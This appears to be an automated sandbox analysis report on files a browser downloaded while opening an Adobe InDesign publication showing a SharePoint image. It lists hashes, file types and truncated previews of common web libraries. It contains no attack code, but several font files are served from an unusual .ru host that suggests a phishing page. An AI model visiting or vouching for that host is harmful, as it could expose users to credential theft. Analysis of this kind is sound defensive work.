                                                                                                                                                                                                                                                                                                              SHA-256:F9745C48D0B4C918D466DA4ACDB3F786EF5CDA4C69AC0B6009D76CFF67E6325D
                                                                                                                                                                                                                                                                                                              SHA-512:4B720F5F9B103686CC7A22978C105D5D9BA53322E1455A8FC40EA8AD2706091E64C967D6EA192A114AE9C8CC585CE2A35D99992439172533D30982A440DB663F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:"https://bam-cell.nr-data.net/1/a3d3f0e0e6?a=7895775&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=7197&ck=1&ref=https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25&be=1633&fe=6469&dc=3117&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1698251234962,%22n%22:0,%22f%22:59,%22dn%22:608,%22dne%22:711,%22c%22:711,%22s%22:712,%22ce%22:932,%22rq%22:932,%22rp%22:1171,%22rpe%22:1171,%22dl%22:1175,%22di%22:2730,%22ds%22:3116,%22de%22:3117,%22dc%22:6467,%22l%22:6468,%22le%22:6472%7D,%22navigation%22:%7B%7D%7D&fp=3192&fcp=3192&jsonp=NREUM.setToken"
                                                                                                                                                                                                                                                                                                              Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0})
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (11084), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):11084
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.26714858103651
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:sANzVNUBOebwvXDA+mJ4fXOrTIjDJfiRxug9xx+EMZajp:PNbUBOjHmJcOgjDJaR1bMZip
                                                                                                                                                                                                                                                                                                              MD5:65F1D21D5FCC9D21DA758ADABABD0C3C
                                                                                                                                                                                                                                                                                                              SHA1:E0661D07D64C00008BC9D013D16EEC0A0F156DC7
                                                                                                                                                                                                                                                                                                              SHA-256:D2B82E612D2A812E8BE2A57300DAB8923C4F2EDBE7A799E7DA70791B595646FE
                                                                                                                                                                                                                                                                                                              SHA-512:DE7D7DC739CED2E6CFA52C1809144180787ADC3AD5F9B7597C72B9D9BD5EB2F21DE06B1FC12B5034F2458DE428B368772700A6665D3F2E02F148A300239E6183
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js
                                                                                                                                                                                                                                                                                                              Preview:window.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!==n)return"pfx"==t?o:!0}return!1}function s(e,t,r){for(var o in e){var i=t[e[o]];if(i!==n)return r===!1?e[o]:a(i,"function")?i.bind(r||t):i}return!1}function u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[n[r]]=!!(n[r]in E);return j.list&&(j.list=!(!t.createElement("datalist")||!e.HTMLDataListElement)),j}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),p.inputtypes=function(e){for(var r,o,a,i=0,c=e.length;c>i;i++)E.setAttribute("type",o=e[i]),r="text"!==E.type,r&&(E.value=x,E.style.cssText="position:
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32888)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):100447
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.381230964577071
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:yaMnNgWgeak12IHg4616nuXFVF6jWmUFgWv190L3Buev78ElXM7UoFsFJAbJ/Sgp:CndNC6nqpUz8AXMvsKdZ
                                                                                                                                                                                                                                                                                                              MD5:3C95D11B8BEF74FD6D8A5E9F744479BC
                                                                                                                                                                                                                                                                                                              SHA1:7B23A8C1722AB3BD4F262A998E4861F9334D1D3A
                                                                                                                                                                                                                                                                                                              SHA-256:31FD9064C4CCB1631D94EFAB741E71EE423612DD4175937436F1E04B8D7775D3
                                                                                                                                                                                                                                                                                                              SHA-512:8EED7A1233FC32500FA608EB3CF06D25AD4FDF1621BF479D6575E53E803BE72A6F38AF1022E3B98747FEF84057F9E67CCA3A789D651AC09D379AE99FACCBCE23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://assets.adobedtm.com/659ec8ada5450db95675e43beaaae92399591a11/satelliteLib-71adc5192d0968edd4a6597bf6d15845088d0f54.js
                                                                                                                                                                                                                                                                                                              Preview:// All code and conventions are protected by copyright.!function(e,t,a){function n(){k.addEventHandler(e,"orientationchange",n.orientationChange)}function i(){this.rules=k.filter(k.rules,function(e){return"elementexists"===e.event})}function r(){this.rules=k.filter(k.rules,function(e){return"videoplayed"===e.event.substring(0,11)}),this.eventHandler=k.bind(this.onUpdateTime,this)}function o(){var e=this.eventRegex=/^hover\(([0-9]+)\)$/,t=this.rules=[];k.each(k.rules,function(a){var n=a.event.match(e);n&&t.push([Number(a.event.match(e)[1]),a.selector])})}function s(t){k.domReady(k.bind(function(){this.twttr=t||e.twttr,this.initialize()},this))}function c(e){this.delay=250,this.FB=e,k.domReady(k.bind(function(){k.poll(k.bind(this.initialize,this),this.delay,8)},this))}function l(t){t=t||k.rules,this.rules=k.filter(t,function(e){return"inview"===e.event}),this.elements=[],this.eventHandler=k.bind(this.track,this),k.addEventHandler(e,"scroll",this.eventHandler),k.addEventHandler(e,"load",t
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (32533)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):172728
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.95989408660361
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:1BCTLwW1W2UBqF2XjDn5bo1mZAn44TDMGPoolBiuLQvGcnn7m0/Ht7b07M7Q08Qn:1+1WhNzD4kik
                                                                                                                                                                                                                                                                                                              MD5:2887A1B27EE5E52565DBCBBA246C31D9
                                                                                                                                                                                                                                                                                                              SHA1:E283D9F9997B935A6415785E59B01AF04F817309
                                                                                                                                                                                                                                                                                                              SHA-256:9B387D7F875407C7576F7ACEAB62124C6B0BA1885DE5D49E6369191EE1A33767
                                                                                                                                                                                                                                                                                                              SHA-512:AF4ADCC4366B1795C9CDC6C5002C19BB687A0EB73826D70ADB38817A8982DFE0C75650ABE32742DBE508692D0C01DC5B6E3550BC5D854DF529F7F838AF2AD3A4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.html
                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">..<head>...<meta charset="utf-8" />...<title>publication</title>...<link href="publication-web-resources/css/idGeneratedStyles.css" rel="stylesheet" type="text/css" />..</head>..<body id="publication" style="width:612px;height:792px;background-color:white;">...<div id="_idContainer000">....<img class="_idGenObjectAttribute-2 _idGenObjectAttribute-1" src="publication-web-resources/image/sharepoint.png" alt="" />...</div>...<div id="_idContainer001" class="Basic-Text-Frame">....<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0%" y="0%" width="100%". height="100%" viewBox="0 0 537.5 50.929" preserveAspectRatio="xMidYMid slice" overflow="visible" xml:space="preserve"><clipPath id="clp_0_1" fill="none">.<path shape-rendering="crispEdges" stroke="#000000" d="M0,0h537.5v50.929H0V0"/></clipPath><g clip-path="url(#clp_0_1)" fill="none">.<path fill="#000000" d="M370.429,18.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):36696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988666025644622
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                                                                                                                                                                                                                                              MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                                                                                                                                                                                              SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                                                                                                                                                                                              SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                                                                                                                                                                                              SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-regular.woff
                                                                                                                                                                                                                                                                                                              Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (45667)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):45806
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.207605835316031
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                                                                                                                                                                                                                                                                              MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                                                                                                                                                                                                                                                              SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                                                                                                                                                                                                                                                              SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                                                                                                                                                                                                                                                              SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                                                                                                                                                                                                                                                                              Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):89
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.352349662662212
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tJ8/l3gk+S3Asup:6v/lhPfA/j+SAsup
                                                                                                                                                                                                                                                                                                              MD5:11654C4796E305307617E6777C2814FE
                                                                                                                                                                                                                                                                                                              SHA1:8590201338DF48CC31728632FA26447B8C109C53
                                                                                                                                                                                                                                                                                                              SHA-256:3AA6B4F5E76AFAD53B2ED02F1E87EFA6A16311474A85D2ECAC9D6FA1C70B2338
                                                                                                                                                                                                                                                                                                              SHA-512:247A47D5DB19C62DE719EF2EF276B6260B42E07B791946EB5C5AC0726CEABA17A722C03F461A826C9E10D46B7E7E9837B83CDCFC0C79AC68FF566337BFD6929D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication-web-resources/image/blankTransparentImage.png
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................pHYs...........~.....IDAT.[c``........}H....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65465)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1048611
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.476909948760051
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:7GgKWGSYO6V35muu60KV1REPHM3C0E4Z1V1R2:ygKhSYO6Hy60KV1REPHM3C0E4Z1Vy
                                                                                                                                                                                                                                                                                                              MD5:6CBDACA601A56FAC4A9077857A335E3A
                                                                                                                                                                                                                                                                                                              SHA1:3A0B930C693885DF68BF4EEF05A5152C238D0712
                                                                                                                                                                                                                                                                                                              SHA-256:F3B3344E105BB8BFED9E12161C06587A076E6F5EBF592CAF844723C1AD4FDBB8
                                                                                                                                                                                                                                                                                                              SHA-512:B3250030D3A5B1C572E0C294F175FB4ED4E575D156D4FC21975C0EF3059F90226F87C04262DE214DA34ED1F03DDF4B883E85620951494AF4E68438A0828A1E6A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/1_b50c358/public/build/static/js/main.61570de4.js
                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see main.61570de4.js.LICENSE.txt */.!function(){var e={1869:function(e,t,n){"use strict";t.R=s;var r,i=(r=n(7313))&&r.__esModule?r:{default:r};function o(){return o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},o.apply(this,arguments)}function a(e,t){if(null==e)return{};var n,r,i=function(e,t){if(null==e)return{};var n,r,i={},o=Object.keys(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||(i[n]=e[n]);return i}(e,t);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(e,n)&&(i[n]=e[n])}return i}function s(e){var t=e.scale,n=void 0===t?"M":t,r=a(e,["scale"]);return i.default.createElement("svg",o({},r,r),"L"===n&&i.default.createElement("path",{d:"M10.563 2.206l-9.249 16.55a.5.5 0 0 0 .436.744h18.5a.5.5 0 0 0 .436-.744l-9.251-16.55a.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):28584
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.992563951996154
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                                                                                                                                                                                                                                                              MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                                                                                                                                                                                              SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                                                                                                                                                                                              SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                                                                                                                                                                                              SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-regular.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3347
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.081953386054171
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:2rWeW+sjKowoaiti+wPGosjjoBYU+iSRocohH+U0Yo44AoK9wJ+tnoSoMzoA:0WeWco8iti7eosj0lIoLtoxQo+oA
                                                                                                                                                                                                                                                                                                              MD5:F72D64387E9C3F785F60A53583DB99E9
                                                                                                                                                                                                                                                                                                              SHA1:5C8F44C37E763C12AEB8F6EF1E6F15643E70F246
                                                                                                                                                                                                                                                                                                              SHA-256:17B0B5846463DE728E85BFF8DBFD31259795F36FD8A6F334DD6E89F9F8B830A5
                                                                                                                                                                                                                                                                                                              SHA-512:BD263607729EC7B07C483FC9EF55FCCE5B385A35D853C6D3C2C855C967F00147D1A103949EF449DF9ADFBDA3A527BA188B5F899CF8314FD5BFCAA761E647592C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication-web-resources/css/idGeneratedStyles.css
                                                                                                                                                                                                                                                                                                              Preview:body, div, dl, dt, dd, h1, h2, h3, h4, h5, h6, p, pre, code, blockquote {..margin:0;..padding:0;..border-width:0;..text-rendering:optimizeSpeed;.}.div > svg {..position:absolute;.}.div.Basic-Text-Frame {..border-style:solid;.}.#_idContainer000 {..-ms-transform:translate(84.000px,190.500px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..-ms-transform-origin:0% 0%;..-webkit-transform:translate(84.000px,190.500px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..-webkit-transform-origin:0% 0%;..height:140.15px;..left:0px;..position:absolute;..top:0px;..transform:translate(84.000px,190.500px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..transform:translate(84.000px,190.500px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..transform-origin:0% 0%;..transform-origin:0% 0%;..width:490.50px;.}.#_idContainer001 {..-ms-transform:translate(99.500px,362.571px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..-ms-transform-origin:0% 0%;..-webkit-transform:translate(99.500
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (34169)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):34170
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.367914145602016
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:3YpyCIUr6uBT1yhljunKMDKKF2Z76x+B5vLZ73akHgMO4B4oq0HVK:30P6uBT1UjnMDGKR
                                                                                                                                                                                                                                                                                                              MD5:98903B4785F1B91F9C957FD50C695F22
                                                                                                                                                                                                                                                                                                              SHA1:2FB6ABCA2C90B53346369175F461D8FC0910CC4E
                                                                                                                                                                                                                                                                                                              SHA-256:BC0C362431A3E24BC0B73971C115A3A077DD40761069CB160AD402C40C529CAA
                                                                                                                                                                                                                                                                                                              SHA-512:957F138C7AC489E69AFB5DD7470FC81145D319963047E98A8C086AC82A6639383E6445AA65DC6373F96072C33AC3E2E3D7C16F6982AB3DF56967A78E81B61DBF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/c359bc3d/api.js?render=explicit
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(function(){function Ke(e,n,i,f,u,y,m){try{var l=e[y](m),d=l.value}catch(h){i(h);return}l.done?n(d):Promise.resolve(d).then(f,u)}function Ze(e){return function(){var n=this,i=arguments;return new Promise(function(f,u){var y=e.apply(n,i);function m(d){Ke(y,f,u,m,l,"next",d)}function l(d){Ke(y,f,u,m,l,"throw",d)}m(void 0)})}}function O(e,n){return n!=null&&typeof Symbol!="undefined"&&n[Symbol.hasInstance]?!!n[Symbol.hasInstance](e):O(e,n)}function ye(e,n,i){return n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i,e}function Le(e){for(var n=1;n<arguments.length;n++){var i=arguments[n]!=null?arguments[n]:{},f=Object.keys(i);typeof Object.getOwnPropertySymbols=="function"&&(f=f.concat(Object.getOwnPropertySymbols(i).filter(function(u){return Object.getOwnPropertyDescriptor(i,u).enumerable}))),f.forEach(function(u){ye(e,u,i[u])})}return e}function et(e){if(Array.isArray(e))return e}function tt(e,n){var i=e==null?null:typeof Symbol!="und
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):43596
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9952701440723475
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                                                                                                                                                                                                                                              MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                                                                                                                                                                                              SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                                                                                                                                                                                              SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                                                                                                                                                                                              SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-vf.woff2
